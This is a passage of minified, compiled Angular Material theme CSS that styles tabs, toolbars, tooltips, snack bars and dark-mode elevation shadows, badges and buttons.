.mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label[_ngcontent-%COMP%], .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link[_ngcontent-%COMP%]{color:#fff}.mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%]{color:#fff6}.mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before{border-color:#fff}.mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%]{border-color:#fff;opacity:.4}.mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#fff;opacity:.12}.mat-tab-group.mat-background-warn[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-background-warn[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-background-warn[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-background-warn[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#ffcdd24d}.mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]{background-color:#f44336}.mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label[_ngcontent-%COMP%], .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link[_ngcontent-%COMP%]{color:#fff}.mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%]{color:#fff6}.mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before{border-color:#fff}.mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%]{border-color:#fff;opacity:.4}.mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#fff;opacity:.12}.mat-toolbar[_ngcontent-%COMP%]{background:whitesmoke;color:#000000de}.mat-toolbar.mat-primary[_ngcontent-%COMP%]{background:#2196f3;color:#fff}.mat-toolbar.mat-accent[_ngcontent-%COMP%]{background:#7b1fa2;color:#fff}.mat-toolbar.mat-warn[_ngcontent-%COMP%]{background:#f44336;color:#fff}.mat-toolbar[_ngcontent-%COMP%]   .mat-form-field-underline[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%]   .mat-form-field-ripple[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%]   .mat-focused[_ngcontent-%COMP%]   .mat-form-field-ripple[_ngcontent-%COMP%]{background-color:currentColor}.mat-toolbar[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%]   .mat-focused[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%]   .mat-select-value[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%]   .mat-select-arrow[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%]   .mat-form-field.mat-focused[_ngcontent-%COMP%]   .mat-select-arrow[_ngcontent-%COMP%]{color:inherit}.mat-toolbar[_ngcontent-%COMP%]   .mat-input-element[_ngcontent-%COMP%]{caret-color:currentColor}.mat-toolbar-multiple-rows[_ngcontent-%COMP%]{min-height:64px}.mat-toolbar-row[_ngcontent-%COMP%], .mat-toolbar-single-row[_ngcontent-%COMP%]{height:64px}@media (max-width: 599px){.mat-toolbar-multiple-rows[_ngcontent-%COMP%]{min-height:56px}.mat-toolbar-row[_ngcontent-%COMP%], .mat-toolbar-single-row[_ngcontent-%COMP%]{height:56px}}.mat-tooltip[_ngcontent-%COMP%]{background:rgba(97,97,97,.9)}.mat-tree[_ngcontent-%COMP%]{background:white}.mat-tree-node[_ngcontent-%COMP%], .mat-nested-tree-node[_ngcontent-%COMP%]{color:#000000de}.mat-tree-node[_ngcontent-%COMP%]{min-height:48px}.mat-snack-bar-container[_ngcontent-%COMP%]{color:#ffffffb3;background:#323232;box-shadow:0 3px 5px -1px #0003,0 6px 10px #00000024,0 1px 18px #0000001f}.mat-simple-snackbar-action[_ngcontent-%COMP%]{color:#7b1fa2}.color-primary[_ngcontent-%COMP%]{color:#2196f3}.background-color-primary[_ngcontent-%COMP%]{background-color:#2196f3}.background-color-accent[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#ffffff1a}.darkMode[_ngcontent-%COMP%]   .mat-option[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-option[_ngcontent-%COMP%]:hover:not(.mat-option-disabled), .darkMode[_ngcontent-%COMP%]   .mat-option[_ngcontent-%COMP%]:focus:not(.mat-option-disabled){background:rgba(255,255,255,.04)}.darkMode[_ngcontent-%COMP%]   .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-option-multiple):not(.mat-option-disabled){background:rgba(255,255,255,.04)}.darkMode[_ngcontent-%COMP%]   .mat-option.mat-active[_ngcontent-%COMP%]{background:rgba(255,255,255,.04);color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-option.mat-option-disabled[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-primary[_ngcontent-%COMP%]   .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-option-disabled){color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-accent[_ngcontent-%COMP%]   .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-option-disabled){color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-warn[_ngcontent-%COMP%]   .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-option-disabled){color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-optgroup-label[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-optgroup-disabled[_ngcontent-%COMP%]   .mat-optgroup-label[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-pseudo-checkbox[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-pseudo-checkbox[_ngcontent-%COMP%]:after{color:#303030}.darkMode[_ngcontent-%COMP%]   .mat-pseudo-checkbox-disabled[_ngcontent-%COMP%]{color:#686868}.darkMode[_ngcontent-%COMP%]   .mat-primary[_ngcontent-%COMP%]   .mat-pseudo-checkbox-checked[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-primary[_ngcontent-%COMP%]   .mat-pseudo-checkbox-indeterminate[_ngcontent-%COMP%]{background:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-pseudo-checkbox-checked[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-pseudo-checkbox-indeterminate[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-accent[_ngcontent-%COMP%]   .mat-pseudo-checkbox-checked[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-accent[_ngcontent-%COMP%]   .mat-pseudo-checkbox-indeterminate[_ngcontent-%COMP%]{background:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-warn[_ngcontent-%COMP%]   .mat-pseudo-checkbox-checked[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-warn[_ngcontent-%COMP%]   .mat-pseudo-checkbox-indeterminate[_ngcontent-%COMP%]{background:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-pseudo-checkbox-checked.mat-pseudo-checkbox-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-pseudo-checkbox-indeterminate.mat-pseudo-checkbox-disabled[_ngcontent-%COMP%]{background:#686868}.darkMode[_ngcontent-%COMP%]   .mat-app-background[_ngcontent-%COMP%], .darkMode.mat-app-background[_ngcontent-%COMP%]{background-color:#303030;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z0[_ngcontent-%COMP%]{box-shadow:0 0 #0003,0 0 #00000024,0 0 #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z1[_ngcontent-%COMP%]{box-shadow:0 2px 1px -1px #0003,0 1px 1px #00000024,0 1px 3px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z2[_ngcontent-%COMP%]{box-shadow:0 3px 1px -2px #0003,0 2px 2px #00000024,0 1px 5px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z3[_ngcontent-%COMP%]{box-shadow:0 3px 3px -2px #0003,0 3px 4px #00000024,0 1px 8px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z4[_ngcontent-%COMP%]{box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z5[_ngcontent-%COMP%]{box-shadow:0 3px 5px -1px #0003,0 5px 8px #00000024,0 1px 14px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z6[_ngcontent-%COMP%]{box-shadow:0 3px 5px -1px #0003,0 6px 10px #00000024,0 1px 18px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z7[_ngcontent-%COMP%]{box-shadow:0 4px 5px -2px #0003,0 7px 10px 1px #00000024,0 2px 16px 1px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z8[_ngcontent-%COMP%]{box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z9[_ngcontent-%COMP%]{box-shadow:0 5px 6px -3px #0003,0 9px 12px 1px #00000024,0 3px 16px 2px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z10[_ngcontent-%COMP%]{box-shadow:0 6px 6px -3px #0003,0 10px 14px 1px #00000024,0 4px 18px 3px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z11[_ngcontent-%COMP%]{box-shadow:0 6px 7px -4px #0003,0 11px 15px 1px #00000024,0 4px 20px 3px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z12[_ngcontent-%COMP%]{box-shadow:0 7px 8px -4px #0003,0 12px 17px 2px #00000024,0 5px 22px 4px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z13[_ngcontent-%COMP%]{box-shadow:0 7px 8px -4px #0003,0 13px 19px 2px #00000024,0 5px 24px 4px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z14[_ngcontent-%COMP%]{box-shadow:0 7px 9px -4px #0003,0 14px 21px 2px #00000024,0 5px 26px 4px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z15[_ngcontent-%COMP%]{box-shadow:0 8px 9px -5px #0003,0 15px 22px 2px #00000024,0 6px 28px 5px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z16[_ngcontent-%COMP%]{box-shadow:0 8px 10px -5px #0003,0 16px 24px 2px #00000024,0 6px 30px 5px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z17[_ngcontent-%COMP%]{box-shadow:0 8px 11px -5px #0003,0 17px 26px 2px #00000024,0 6px 32px 5px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z18[_ngcontent-%COMP%]{box-shadow:0 9px 11px -5px #0003,0 18px 28px 2px #00000024,0 7px 34px 6px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z19[_ngcontent-%COMP%]{box-shadow:0 9px 12px -6px #0003,0 19px 29px 2px #00000024,0 7px 36px 6px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z20[_ngcontent-%COMP%]{box-shadow:0 10px 13px -6px #0003,0 20px 31px 3px #00000024,0 8px 38px 7px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z21[_ngcontent-%COMP%]{box-shadow:0 10px 13px -6px #0003,0 21px 33px 3px #00000024,0 8px 40px 7px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z22[_ngcontent-%COMP%]{box-shadow:0 10px 14px -6px #0003,0 22px 35px 3px #00000024,0 8px 42px 7px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z23[_ngcontent-%COMP%]{box-shadow:0 11px 14px -7px #0003,0 23px 36px 3px #00000024,0 9px 44px 8px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-elevation-z24[_ngcontent-%COMP%]{box-shadow:0 11px 15px -7px #0003,0 24px 38px 3px #00000024,0 9px 46px 8px #0000001f}.mat-theme-loaded-marker[_ngcontent-%COMP%]{display:none}.darkMode[_ngcontent-%COMP%]   .mat-autocomplete-panel[_ngcontent-%COMP%]{background:#424242;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-autocomplete-panel[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-autocomplete-panel[_ngcontent-%COMP%]   .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-active):not(:hover){background:#424242}.darkMode[_ngcontent-%COMP%]   .mat-autocomplete-panel[_ngcontent-%COMP%]   .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-active):not(:hover):not(.mat-option-disabled){color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{color:#fff;background:#2196f3}.cdk-high-contrast-active[_ngcontent-%COMP%]   .darkMode[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{outline:solid 1px;border-radius:0}.darkMode[_ngcontent-%COMP%]   .mat-badge-accent[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{background:#7b1fa2;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-badge-warn[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{color:#fff;background:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-badge-disabled[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{background:#6e6e6e;color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-bottom-sheet-container[_ngcontent-%COMP%]{box-shadow:0 8px 10px -5px #0003,0 16px 24px 2px #00000024,0 6px 30px 5px #0000001f;background:#424242;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-button[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-icon-button[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-stroked-button[_ngcontent-%COMP%]{color:inherit;background:transparent}.darkMode[_ngcontent-%COMP%]   .mat-button.mat-primary[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-icon-button.mat-primary[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-stroked-button.mat-primary[_ngcontent-%COMP%]{color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-button.mat-accent[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-icon-button.mat-accent[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-stroked-button.mat-accent[_ngcontent-%COMP%]{color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-button.mat-warn[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-icon-button.mat-warn[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-stroked-button.mat-warn[_ngcontent-%COMP%]{color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-icon-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-icon-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-icon-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-icon-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-stroked-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-stroked-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-stroked-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-stroked-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%]{color:#ffffff4d}.darkMode[_ngcontent-%COMP%]   .mat-button.mat-primary[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-icon-button.mat-primary[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-stroked-button.mat-primary[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%]{background-color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-button.mat-accent[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-icon-button.mat-accent[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-stroked-button.mat-accent[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-button.mat-warn[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-icon-button.mat-warn[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-stroked-button.mat-warn[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-button.mat-button-disabled[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-icon-button.mat-button-disabled[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-stroked-button.mat-button-disabled[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%]{background-color:transparent}.darkMode[_ngcontent-%COMP%]   .mat-button[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-icon-button[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-stroked-button[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{opacity:.1;background-color:currentColor}.darkMode[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%]{background:white}.darkMode[_ngcontent-%COMP%]   .mat-stroked-button[_ngcontent-%COMP%]:not(.mat-button-disabled){border-color:#ffffff1f}.darkMode[_ngcontent-%COMP%]   .mat-flat-button[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab[_ngcontent-%COMP%]{color:#fff;background-color:#424242}.darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-primary[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-primary[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-primary[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-primary[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-accent[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-accent[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-accent[_ngcontent-%COMP%], 